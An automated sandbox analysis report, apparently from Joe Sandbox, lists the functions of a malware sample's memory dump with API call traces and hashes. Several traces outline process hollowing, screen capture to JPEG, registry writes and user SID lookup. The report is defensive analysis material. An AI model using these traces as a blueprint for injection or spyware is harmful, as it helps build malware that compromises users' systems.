Opcode ID: ab91ca60a20c287c1c5583eb1fbb47b81ff406306d8cd16cd83830bac05feb8c
Instruction ID: 837f5d78f9c66f60a6617cd9a952ced962186645de2e284402b4c87a35847b3c
Opcode Fuzzy Hash: ab91ca60a20c287c1c5583eb1fbb47b81ff406306d8cd16cd83830bac05feb8c
Instruction Fuzzy Hash: 2351C27190021DAFDB11DFA5CC85BEFBBB9EF09354F040057E500A7292D778D9828BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00419924 Relevance: 4.6, APIs: 3, Instructions: 61
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,004053F0,?,00419852,004053F0,00432D88,0000000C,00419904,00432C68), ref: 0041997A
GetLastError.KERNEL32(?,00419852,004053F0,00432D88,0000000C,00419904,00432C68), ref: 00419984
__dosmaperr.LIBCMT ref: 004199AF

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID:
API String ID: 490808831-0
Opcode ID: 2b2aa1e17130052969f511920c8d9b7bd38c21e9ce4f40ccfeea4e6fafd09151
Instruction ID: 3b3cc6fbd97f1f066c9ae788ba2b2ff40a2ea36384badba486636077b6a2bee8
Opcode Fuzzy Hash: 2b2aa1e17130052969f511920c8d9b7bd38c21e9ce4f40ccfeea4e6fafd09151
Instruction Fuzzy Hash: 23010873A2511426D62512355966BFF6785CF82778F35025FE819873D2DB2C8CC1819C

Uniqueness

Uniqueness Score: -1.00%

Function 00419CBA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,BdA,0041EB72,00000220,?,?,?,?,?,?,00416442,?), ref: 00419CEC

Strings

BdA, xrefs: 00419CBC

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: BdA
API String ID: 1279760036-2350210841
Opcode ID: 626224e02596ec48c51616d106d09d7cd8318e7088108fd05f982d030daeea05
Instruction ID: ff2956a3bc9961dac5ee94a6f3f333ab6ebcafba817254e414bd46a918bf4ef1
Opcode Fuzzy Hash: 626224e02596ec48c51616d106d09d7cd8318e7088108fd05f982d030daeea05
Instruction Fuzzy Hash: 78E0E53120062666D6312B269C11BDB7ADCAB413A0F050027EDA7D6280EF28DCC181EE

Uniqueness

Uniqueness Score: -1.00%

Function 004083DF Relevance: 3.3, APIs: 2, Instructions: 336
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00001388), ref: 00408476
__fread_nolock.LIBCMT ref: 004086DB

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: Sleep__fread_nolock
String ID:
API String ID: 1389363356-0
Opcode ID: 794d77d579f4e2453ee01bbdf0b03141b80c9c0e0ce390a7751baf804230211a
Instruction ID: 70acacbd639602245d695e8ab80f0b01b2f2712202afba2cf85586245fc89fbd
Opcode Fuzzy Hash: 794d77d579f4e2453ee01bbdf0b03141b80c9c0e0ce390a7751baf804230211a
Instruction Fuzzy Hash: D2B12971500104ABDF04EF28CE85BDE3B26AF85318F64427EF884672C6EB3DD9818799

Uniqueness

Uniqueness Score: -1.00%

Function 00409653 Relevance: 3.1, APIs: 2, Instructions: 131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNELBASE(?,00000000), ref: 00409665
GetFileAttributesA.KERNELBASE(?), ref: 00409677

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: 531d63777ebaa3c78b4794222b5dee68b3990a9f94c23d1a17900caa92ae6025
Instruction ID: a460e110d0d0f5933110fcf23fd218f5a86b906106e467dd14a658ccb6e12c38
Opcode Fuzzy Hash: 531d63777ebaa3c78b4794222b5dee68b3990a9f94c23d1a17900caa92ae6025
Instruction Fuzzy Hash: 1E41E772A101089BDB04EEA8CDC67DDBB36AF45314F64062AE950B32C3D7399E918695

Uniqueness

Uniqueness Score: -1.00%

Function 004183D1 Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 00418419

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 26a708c288b1dc58b1e15fcdb883a68f93b991a53d3ebeebe72b5f4a05ba0b24
Instruction ID: dfa9702255f62cb3cb4353a614b8a5ed4725a8f8debe2adf5da11e4d656e509c
Opcode Fuzzy Hash: 26a708c288b1dc58b1e15fcdb883a68f93b991a53d3ebeebe72b5f4a05ba0b24
Instruction Fuzzy Hash: B5E0E532601811429231263B7C412EB5581AB81339F25033FF930C61D2EF7C48C740AE

Uniqueness

Uniqueness Score: -1.00%

Function 004123E0 Relevance: 1.6, APIs: 1, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00412501

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 4f807415a11ef92d1bdb1e1a38005cafaa618d755f5903798671a0b9c3e1a1da
Instruction ID: 193c8c39d0e3e439ae626e2fd71d918cedb3ce1c8bb6da3de5f7e74544803e66
Opcode Fuzzy Hash: 4f807415a11ef92d1bdb1e1a38005cafaa618d755f5903798671a0b9c3e1a1da
Instruction Fuzzy Hash: 223139717003045BD724DE69DA84A9EB799EF85320B20432FF865C7392D6BCDDE08759

Uniqueness

Uniqueness Score: -1.00%

Function 0041962F Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wsopen_s.LIBCMT ref: 00419669

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 39e51a9ae018aa96119cc8505797bbbfd6c23de372fe853808090607bbf11af8
Instruction ID: 7e5d8822000000ebba8045cea2736b59b79b9537bdc47353c1db78e732dc8f0f
Opcode Fuzzy Hash: 39e51a9ae018aa96119cc8505797bbbfd6c23de372fe853808090607bbf11af8
Instruction Fuzzy Hash: 53111871A0420AAFCB06DF59E9419DB7BF5EF48304F05406AF809AB351DA31ED11CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004155CB Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a904d00dda0d57bc17b92292b31e8e771987b195a79d7391280212123336c54
Instruction ID: 2777bc52c9a3c9182af6afd380e36f399095c82ca25c3784a46c28e84db93237
Opcode Fuzzy Hash: 0a904d00dda0d57bc17b92292b31e8e771987b195a79d7391280212123336c54
Instruction Fuzzy Hash: FEF0F932511A1496C6213A2A9C057DB73A89F9233CF54031FF879831C1DA7CDC8385DE

Uniqueness

Uniqueness Score: -1.00%

Function 00420D39 Relevance: 1.5, APIs: 1, Instructions: 42
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 00420D9C

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e43daa36d4e3b98fe9eaad37845bd71be2617df6f7e058b73db5456717152701
Instruction ID: d1fd3b94597a674e525cf6cba51770ef81cfb4d80bef7a8c46861990a5d999cc
Opcode Fuzzy Hash: e43daa36d4e3b98fe9eaad37845bd71be2617df6f7e058b73db5456717152701
Instruction Fuzzy Hash: C8017172D11119EFCF01AFE9DC019EE7FF5AF08300F544166F914E2192E6358A619B94

Uniqueness

Uniqueness Score: -1.00%

Function 004221B3 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00419CBA: RtlAllocateHeap.NTDLL(00000000,?,?,BdA,0041EB72,00000220,?,?,?,?,?,?,00416442,?), ref: 00419CEC

_free.LIBCMT ref: 004221D3

Part of subcall function 004197D1: HeapFree.KERNEL32(00000000,00000000,?,004188F1), ref: 004197E7
Part of subcall function 004197D1: GetLastError.KERNEL32(?,?,004188F1), ref: 004197F9

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: a865f330ce957def869df9d8cea47ba60f9f327c6e65bae7186580a1d4466e18
Instruction ID: 762926eaf4b6531e3781f9d989071304d0260f454e5d1cfb36902fad16b3b60c
Opcode Fuzzy Hash: a865f330ce957def869df9d8cea47ba60f9f327c6e65bae7186580a1d4466e18
Instruction Fuzzy Hash: B5F062721057009FD3249F45E901B92F7E8FF41721F10842FE29A8B5A0DBB4A4418B98

Uniqueness

Uniqueness Score: -1.00%

Function 00420A80 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00420E70,?,?,00000000,?,00420E70,00000000,0000000C), ref: 00420A9D

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9a6ad2ea90029b4c2e15957a97bae2e606db04cb1e580b5057d6e7233006ae40
Instruction ID: df6ee74224201c279f888e790554f52de9bf06fc31efb5333251f0d5694bd2f3
Opcode Fuzzy Hash: 9a6ad2ea90029b4c2e15957a97bae2e606db04cb1e580b5057d6e7233006ae40
Instruction Fuzzy Hash: F1D06C3210010DBFDF128F84DD06EDA3FAAFB48754F014110BE1856020C732E832EB94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00402150 Relevance: 51.7, APIs: 28, Strings: 1, Instructions: 931registrywindowfileCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,00000400,00000000,00000001,?,?,?,00000001), ref: 004023C1
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400,?,00000400,00000000,00000001,?,?,?,00000001), ref: 004023E9
RegCloseKey.ADVAPI32(?,?,00000400,00000000,00000001,?,?,?,00000001), ref: 004023F2
RegOpenKeyExA.ADVAPI32(80000001,00000001,00000000,000F003F,?), ref: 004024D9
RegSetValueExA.ADVAPI32(80000001,?,00000000,00000001,?,?), ref: 00402507
RegCloseKey.ADVAPI32(80000001), ref: 00402510
GdiplusStartup.GDIPLUS(?,?,00000000,?,?,?), ref: 0040261B
GetDC.USER32(00000000), ref: 00402702
RegGetValueA.ADVAPI32(80000002,?,00000000,00000018,00000000,?,00000004), ref: 00402934
GetSystemMetrics.USER32 ref: 00402977
GetSystemMetrics.USER32 ref: 00402984
RegGetValueA.ADVAPI32(80000002,?,00000000,00000018,00000000,?,00000004), ref: 004029C9
GetSystemMetrics.USER32 ref: 00402A06
GetSystemMetrics.USER32 ref: 00402A13
CreateCompatibleDC.GDI32(?), ref: 00402A1C
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00402A2E
SelectObject.GDI32(00000000,00000000), ref: 00402A3B
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00402A5B
GdipCreateBitmapFromHBITMAP.GDIPLUS(00000000,00000000,00000010), ref: 00402A6F
GdipGetImageEncodersSize.GDIPLUS(00000000,?), ref: 00402A8B
GdipGetImageEncoders.GDIPLUS(00000000,00000000,00000000), ref: 00402AB2
GdipSaveImageToFile.GDIPLUS(00000000,?,?,00000000), ref: 00402B3D
SelectObject.GDI32(00000000,?), ref: 00402B47
DeleteObject.GDI32(00000000), ref: 00402B54
DeleteObject.GDI32(?), ref: 00402B59
ReleaseDC.USER32 ref: 00402B60
GdipDisposeImage.GDIPLUS(00000000), ref: 00402B67
GdiplusShutdown.GDIPLUS(?), ref: 00402BEC

Strings

image/jpeg, xrefs: 00402AC4

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: Gdip$ImageMetricsObjectSystemValue$Create$BitmapCloseCompatibleDeleteEncodersGdiplusOpenSelect$DisposeFileFromQueryReleaseSaveShutdownSizeStartup
String ID: image/jpeg
API String ID: 406439762-3785015651
Opcode ID: 13a9bf42e7724d04afe2575518815b9565398da5955cb6e7499da83de78792ad
Instruction ID: 2a3af97711393903ce044b0639feea91c60cc8dde71b0b5cd7786460444d51c8
Opcode Fuzzy Hash: 13a9bf42e7724d04afe2575518815b9565398da5955cb6e7499da83de78792ad
Instruction Fuzzy Hash: 58623931A002049BDF18DF64CE89BEDBB76EF45304F10816DF805A72C5DBB99A85CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00403170 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 155injectionthreadmemoryCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,00000000), ref: 0040318C
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 004031E5
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,00000000,00000000), ref: 004031FE
GetThreadContext.KERNEL32(?,00000000,?,00000000,00000000), ref: 00403213
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,00000000), ref: 00403236
GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,00000000,00000000), ref: 0040324E
GetProcAddress.KERNEL32(00000000), ref: 00403255
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,00000000,00000000), ref: 00403274
WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 0040328F
WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000,?,00000000,00000000), ref: 004032CC
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000,?,00000000,00000000), ref: 004032FC
SetThreadContext.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00403312
ResumeThread.KERNEL32(?,?,?,00000000,?,00000000,00000000), ref: 0040331B
VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,?,00000000,00000000), ref: 00403329
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00000000), ref: 00403340

Strings

ntdll.dll, xrefs: 00403249
NtUnmapViewOfSection, xrefs: 00403244

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
String ID: NtUnmapViewOfSection$ntdll.dll
API String ID: 4033543172-1050664331
Opcode ID: 4a7e2e10a36cbe9272a2b1ae168a4c735c7f49e990834c585849c5ec26639a6e
Instruction ID: 4c7df23a3b05df76bd13a845669199dc5cdec4b584c30c15e13326d4a179f2db
Opcode Fuzzy Hash: 4a7e2e10a36cbe9272a2b1ae168a4c735c7f49e990834c585849c5ec26639a6e
Instruction Fuzzy Hash: 60518D71A40305BBDB218FA4DC85FEABB78FF08705F504025FA14EA2D0D775A955CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00402C50 Relevance: 27.2, APIs: 18, Instructions: 198memoryCOMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 00402C7A
GetProcessHeap.KERNEL32(00000008,?), ref: 00402C8F
HeapAlloc.KERNEL32(00000000), ref: 00402C92
GetUserNameW.ADVAPI32(00000000,?), ref: 00402CA0
LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00402CC3
GetProcessHeap.KERNEL32(00000008,?), ref: 00402CCE
HeapAlloc.KERNEL32(00000000), ref: 00402CD1
GetProcessHeap.KERNEL32(00000008,?), ref: 00402CE1
HeapAlloc.KERNEL32(00000000), ref: 00402CE4
LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00402D0E
ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00402D21
GetProcessHeap.KERNEL32(00000000,?), ref: 00402E15
HeapFree.KERNEL32(00000000), ref: 00402E1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402E23
HeapFree.KERNEL32(00000000), ref: 00402E26
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402E2D
HeapFree.KERNEL32(00000000), ref: 00402E30
LocalFree.KERNEL32(00000000), ref: 00402E35

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
String ID:
API String ID: 3326663573-0
Opcode ID: 9bd27069bc94fc7f623474d1292228c9bbd8ae4ceab2626324286f747fefc4a4
Instruction ID: 17767c5e5f715745eb2a19f504d123cee3413f9eecb9746004963696690f799e
Opcode Fuzzy Hash: 9bd27069bc94fc7f623474d1292228c9bbd8ae4ceab2626324286f747fefc4a4
Instruction Fuzzy Hash: 5B518171A00219AFDB25DFA5DD88BEFBB78EF44304F10416AE905B3281DB749E45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00407090 Relevance: 16.8, APIs: 11, Instructions: 303synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(00000000,00000000,?), ref: 004070F1
GetLastError.KERNEL32(?,00000000), ref: 004070F7

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: CreateErrorLastMutex
String ID:
API String ID: 1925916568-0
Opcode ID: 71d44461f6dfe7e696428669702e692f76ad44ffbf0b406cdde06d2ca89842de
Instruction ID: bff0f4d6569e0080ddd45063cb45d7612aa7ea86238099fb1b50d538531b7cf2
Opcode Fuzzy Hash: 71d44461f6dfe7e696428669702e692f76ad44ffbf0b406cdde06d2ca89842de
Instruction Fuzzy Hash: 3FA1D431A00208ABEB14DF64CC85BEE7B79EF45301F60416AF915A72D1D738EA81CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00421B1C Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 171timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0042F678), ref: 00421B86
_free.LIBCMT ref: 00421B74

Part of subcall function 004197D1: HeapFree.KERNEL32(00000000,00000000,?,004188F1), ref: 004197E7
Part of subcall function 004197D1: GetLastError.KERNEL32(?,?,004188F1), ref: 004197F9

_free.LIBCMT ref: 00421D40

Strings

hD`C, xrefs: 00421BF5

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapInformationLastTimeZone
String ID: hD`C
API String ID: 2155170405-577592929
Opcode ID: 3195bc4e450a37b945fe6452d03102a9d4f29776c86756da530a540f3941e176
Instruction ID: d6623314087da33e64dc71423d0df748729e4de3c472c07ebb51a3c498b6291a
Opcode Fuzzy Hash: 3195bc4e450a37b945fe6452d03102a9d4f29776c86756da530a540f3941e176
Instruction Fuzzy Hash: 3C518E71A00229FBC714DF76EC819AE77B8EF54314F51016BE411D32A1E7389E418B5C

Uniqueness

Uniqueness Score: -1.00%

Function 00405230 Relevance: 6.1, APIs: 4, Instructions: 146libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,?,?,00000000), ref: 00405286
GetModuleHandleA.KERNEL32(00000000,00000000), ref: 004052E5
GetProcAddress.KERNEL32(00000000), ref: 004052EC

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID:
API String ID: 3310240892-0
Opcode ID: 99a8f7e6187273d87de13963f39ec75784b4e1fdce918a97a7133b03ccf2e118
Instruction ID: a9a4a664c9939211a76a92ae827ec43f77a99291f24eb1d3be409b64d8ed4571
